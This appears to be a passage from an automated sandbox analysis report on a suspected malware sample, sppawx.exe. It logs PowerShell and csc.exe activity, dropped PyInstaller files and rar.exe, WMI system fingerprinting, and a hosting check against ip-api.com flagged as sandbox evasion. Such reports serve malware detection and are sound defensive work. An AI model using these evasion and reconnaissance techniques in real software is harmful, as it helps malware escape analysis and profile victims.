              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\getmac.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID=&quot;1&quot;} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element=&quot;Win32_NetworkAdapter.DeviceID=\&quot;1\&quot;&quot;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7381Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2140Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7575
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1824
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7202
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2354
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3062
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3025
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3138
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3846
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4325
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 500
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3742
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 541
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3216
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1230
              Source: C:\Users\user\Desktop\sppawx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78082\select.pydJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.dllJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78082\python312.dllJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78082\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78082\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78082\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78082\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78082\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78082\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78082\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78082\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78082\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78082\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\sppawx.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17526
              Source: C:\Users\user\Desktop\sppawx.exeAPI coverage: 8.1 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5424Thread sleep count: 7381 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5424Thread sleep count: 2140 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7132Thread sleep time: -7378697629483816s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5660Thread sleep count: 7575 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648Thread sleep count: 1824 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2900Thread sleep time: -9223372036854770s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3268Thread sleep count: 7202 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7964Thread sleep count: 2354 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8020Thread sleep count: 3062 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4484Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8020Thread sleep count: 162 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3728Thread sleep time: -14757395258967632s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6232Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4484Thread sleep count: 3846 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8056Thread sleep count: 42 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4356Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4320Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2620Thread sleep count: 4325 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2620Thread sleep count: 500 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8136Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8168Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7980Thread sleep count: 3742 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2496Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2028Thread sleep count: 541 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2884Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1792Thread sleep count: 3216 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1792Thread sleep count: 1230 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6432Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A3183B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF79A3183B0
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A3192F0 FindFirstFileExW,FindClose,0_2_00007FF79A3192F0
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A3318E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF79A3318E4
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A3192F0 FindFirstFileExW,FindClose,2_2_00007FF79A3192F0
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A3183B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF79A3183B0
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FF79A3318E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF79A3318E4
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256D46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,103_2_00007FF6256D46EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6257188E0 FindFirstFileExA,103_2_00007FF6257188E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256CE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,103_2_00007FF6256CE21C
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 2_2_00007FFEDD2A0180 GetSystemInfo,2_2_00007FFEDD2A0180
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
